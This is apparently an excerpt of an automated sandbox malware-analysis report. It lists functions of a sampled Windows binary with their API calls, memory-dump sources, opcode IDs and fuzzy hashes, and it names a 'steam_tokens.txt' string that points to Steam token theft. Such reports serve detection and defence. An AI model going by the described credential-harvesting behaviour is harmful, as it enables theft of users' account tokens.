                          • Instruction Fuzzy Hash: C44199B2A20118EBCB15EB68DC49FED73B8FF48300F004564BA16A72D1DE749E859F50
                          Function 0071ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071ECDF
                          • lstrlen.KERNEL32(00000000), ref: 0071ECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071ED1D
                          • lstrlen.KERNEL32(00000000), ref: 0071ED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0071ED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: 8d62368cdbdec930470bfa1a4db5de91809d1e1159b28d4d0f5cd27afe79436b
                          • Instruction ID: 655eba1eb398ed796d7d67a9538b1ad017b21edda85a22c16d4c0bd30205cff0
                          • Opcode Fuzzy Hash: 8d62368cdbdec930470bfa1a4db5de91809d1e1159b28d4d0f5cd27afe79436b
                          • Instruction Fuzzy Hash: 53311E72B24555DBC722BB7CEC4E99E77A4AF50300F045220BC45AB293DE2CDD4A4BD1
                          Function 00709A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0070140E), ref: 00709A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0070140E), ref: 00709AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,0070140E), ref: 00709AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,0070140E,00000000,?,?,?,0070140E), ref: 00709AE0
                          • LocalFree.KERNEL32(?,?,?,?,0070140E), ref: 00709B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,0070140E), ref: 00709B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 303180cd00fae9cf74efd0ccfe4735a2e5347861b1181dbd97bbda8e3c4df94c
                          • Instruction ID: 1000bd7f784a5ec2cb2f315b4d0fe4568c4a9d2318d3ec1125b02e88ea56dd3f
                          • Opcode Fuzzy Hash: 303180cd00fae9cf74efd0ccfe4735a2e5347861b1181dbd97bbda8e3c4df94c
                          • Instruction Fuzzy Hash: 79111CB1614209EFE710DFA9DD88EAB77ACEB44750F104259FA11E72C1EB749D50CBA0
                          Function 00725AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725B14
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00725B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 00725B89
                          • memmove.MSVCRT(00000000,?,?), ref: 00725B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: b4544f5ed5938a093d0bb63d8a5f39d25c25c5581c34edae9e7e6ebd062ee155
                          • Instruction ID: efbf638e03b2b4762c8501bad6d085485660287095f557a6ce9e9ca1476c11ae
                          • Opcode Fuzzy Hash: b4544f5ed5938a093d0bb63d8a5f39d25c25c5581c34edae9e7e6ebd062ee155
                          • Instruction Fuzzy Hash: C54173B1B005199FCF18DF6CD895A6EB7F5EB88310F158229E905E7344E634DD01CB90
                          Function 007290DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: efc0d3826af1fec86d9b11969739cddaa536feca037ae2116563b50b322c5ad0
                          • Instruction ID: 71fe6c6714eef5b52ec0e756f3f46ed535ef0cd515c9368181530cef2b8fe2d6
                          • Opcode Fuzzy Hash: efc0d3826af1fec86d9b11969739cddaa536feca037ae2116563b50b322c5ad0
                          • Instruction Fuzzy Hash: EA412B7150076CAEDB358B259D89FFB7BFCAB45304F1C44E8D68686182E2759A45CF20
                          Function 00717D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717D58
                            • Part of subcall function 0072A1C0: std::exception::exception.LIBCMT ref: 0072A1D5
                            • Part of subcall function 0072A1C0: std::exception::exception.LIBCMT ref: 0072A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: 68519c8db1c047e1bbb91e8cf74018e7ae355728db774a263cf4843d03e1ff90
                          • Instruction ID: 89a8eba5c85c7d25f431aceddeb98429df3bac7ecaab23648d5657f362860c9e
                          • Opcode Fuzzy Hash: 68519c8db1c047e1bbb91e8cf74018e7ae355728db774a263cf4843d03e1ff90
                          • Instruction Fuzzy Hash: 8321D7323042049BD728DE2CE881A7AF7F5AF91710F204A6EE4918B2C1D774DC84C761
                          Function 007233C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007233EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007233F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00723411
                          • wsprintfA.USER32 ref: 00723437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: d68a1186f045fec6215ed2be78a12beb83a9b620a877544ceb922b0755697a0f
                          • Instruction ID: c8b80ec43e451ccfd7fbd7b4882263106494fc5263195d1f5f2f6aa9b82c7ef9
                          • Opcode Fuzzy Hash: d68a1186f045fec6215ed2be78a12beb83a9b620a877544ceb922b0755697a0f
                          • Instruction Fuzzy Hash: C901D8B1B18614AFDB04DFA8DD49B7EB7B8FB45710F000229F906E7380D7B85D008AA5
                          Function 0072926D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit$__getptdfree
                          • String ID: Xus$Xus
                          • API String ID: 2640026729-3195049111
                          • Opcode ID: 284aedfb607e401738480c198a99cc505035778738a5c9ce7687f5abb0398ef1
                          • Instruction ID: 26225acb4e19afd6e5a745c7a4a9dc7bc7165149ab6c0381d99c40c146da623d
                          • Opcode Fuzzy Hash: 284aedfb607e401738480c198a99cc505035778738a5c9ce7687f5abb0398ef1
                          • Instruction Fuzzy Hash: 5301C072906B31FBEB28EB68B80A79DB3E07F00B20F194114E90067681CB2C6D41DBD9
                          Function 00722400 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlenmemset
                          • String ID:
                          • API String ID: 3212139465-0
                          • Opcode ID: a5a357fc22c84e8a1e2c051f43e7afb957e510f2535ed2439fae4ad314d19db2
                          • Instruction ID: d422044476ffdc246981724e4843a0247ab6723c2b27d1dbfe9a0bfad957c824
                          • Opcode Fuzzy Hash: a5a357fc22c84e8a1e2c051f43e7afb957e510f2535ed2439fae4ad314d19db2
                          • Instruction Fuzzy Hash: D18114B1E00215ABDB14DF95EC44BAEB7B5AF84300F1481A8E504A7382EB79DD46CF90
                          Function 00717EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00717F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00717F60
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 00717FA5
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 00717FD3
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 00718007
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 62d0e324a3aeaa351853ecf497b0cb5d1bb326df723ca5d66e921b03d0ee6bff
                          • Instruction ID: 4022b01829b572afa4746e383187b3cab3e4a97ec6cc014ae48000500a5826a3
                          • Opcode Fuzzy Hash: 62d0e324a3aeaa351853ecf497b0cb5d1bb326df723ca5d66e921b03d0ee6bff
                          • Instruction Fuzzy Hash: E7418E7060811ADFCB24DF6CD884EDA77B8FF54300F114199E8059B291DB79AA97CF91
                          Function 00718050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007180BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007180EA
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 00718102
                          • lstrlen.KERNEL32(00000000), ref: 00718140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 9abd10fac235dbeff676f2cd6a1ad526da6cbac906c367bccfd720e948aab52e
                          • Instruction ID: 6835f89d380c748d793ae80a85ebe8822f77b60abcf23bf90b94bd49fb92ca9f
                          • Opcode Fuzzy Hash: 9abd10fac235dbeff676f2cd6a1ad526da6cbac906c367bccfd720e948aab52e
                          • Instruction Fuzzy Hash: D5415F7660010AEBCB61DF7CD988BEABBF4AB44700F10851CA845D7285EE38DD86DB91
